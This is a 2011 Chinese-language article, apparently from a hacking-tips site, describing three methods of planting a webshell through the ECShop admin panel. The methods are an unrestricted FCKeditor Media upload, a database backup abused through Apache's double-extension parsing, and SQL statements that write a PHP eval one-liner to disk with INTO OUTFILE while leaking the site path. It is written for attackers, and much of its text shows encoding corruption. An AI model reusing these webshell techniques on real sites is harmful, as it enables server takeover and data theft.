Ecshop后臺(tái)拿shell方法總結(jié)

發(fā)布時(shí)間：2011-03-31 23:29:18 作者：佚名

我要評(píng)論

Ecshop后臺(tái)拿shell方法總結(jié),正在使用ecshop建站的朋友一定要注意升級(jí)。

方法一：龍兒心發(fā)明的，版本未定，估計(jì)都行。

進(jìn)入后臺(tái)-系統(tǒng)設(shè)置-Flash播放器管理

可以上傳任意文件。

[includes/fckeditor /editor/filemanager/connectors/php/config.php文件對(duì)Media沒(méi)有任何限制，直接Type=Media 上傳你的webshell，訪問(wèn)路徑為http://target/images/upload/Media/xxx.php]

方法二：另外一種是利用ecshop后臺(tái)的數(shù)據(jù)庫(kù)備份功能

這里選擇自定義備份，目的是使你備份出來(lái)的文件盡量的小，要是太大的話也很麻煩。

然后去前臺(tái)留個(gè)言，內(nèi)容是我們的一句話木馬，接著在后臺(tái)選擇備份ecs_feedback這張表，就是存放留言的表，如圖：

然后會(huì)顯示備份成功。

但是ecshop備份的文件都強(qiáng)行會(huì)在你填的備份的名字后面加上.sql擴(kuò)展名(元備份名我填的是l4yn3.php)，如圖。

這么做無(wú)非就是提高安全性，可是設(shè)計(jì)者忽略了一個(gè)問(wèn)題，如果php是在apache下運(yùn)行的，利用apache的文件解析漏洞這種方式形同虛設(shè)。
因?yàn)閍pache有個(gè)漏洞就是對(duì)文件名是1.php.sql這種形式，只要最后的文件擴(kuò)展名是apache不能能解析的，他就會(huì)按照php文件來(lái)解析它，那在這里sql文件就是apache不能夠解析的文件，那么他理所當(dāng)然會(huì)把這個(gè)文件當(dāng)作php文件來(lái)執(zhí)行。

所以如果是apache+php的話，即使文件名變成了上面這樣，也可以正常解析，你所需要做的就是點(diǎn)一下備份后的鏈接。
所以您看出來(lái)了，這種拿shell的方式是需要你的環(huán)境是apache+php的。而且還有個(gè)條件是GPC魔術(shù)轉(zhuǎn)換不能開(kāi)啟，所以也很雞肋。

方法三：ecshop后臺(tái)有一個(gè)功能是sql查詢，如圖：

其實(shí)感覺(jué)在一個(gè)管理系統(tǒng)的后臺(tái)放這么個(gè)功能根本沒(méi)用，有多少網(wǎng)站管理員有這么高的覺(jué)悟，會(huì)用這個(gè)？
不過(guò)也不錯(cuò)，便宜了我們小菜拿shell。
方法就像phpmyadmin一樣直接操作sql語(yǔ)句導(dǎo)出一句話木馬拿shell。
語(yǔ)句如下：

show databases;
use 數(shù)據(jù)庫(kù)名;
create a(cmd text not null);
insert into a(cmd) values('<?php eval($_POST[cmd]);?>');
select cmd from a into outfile '導(dǎo)出路徑';
drop table if exists a;

很常規(guī)的語(yǔ)句。也許有人會(huì)問(wèn)不知道網(wǎng)站路徑怎么辦，那要導(dǎo)出到哪呢？這里有一個(gè)技巧就是 use 數(shù)據(jù)庫(kù)名; 這句話，其實(shí)在這個(gè)sql查詢功能中默認(rèn)用的數(shù)據(jù)庫(kù)就是本網(wǎng)站的數(shù)據(jù)庫(kù)，開(kāi)發(fā)者設(shè)計(jì)的時(shí)候不會(huì)考慮你去use 其他的數(shù)據(jù)庫(kù)，所以這里你用"use 數(shù)據(jù)名庫(kù)"這句時(shí)，會(huì)產(chǎn)生一個(gè)警告，但并不影響sql的運(yùn)行，卻可以成功爆出網(wǎng)站的路徑，多次測(cè)試均成功，如圖：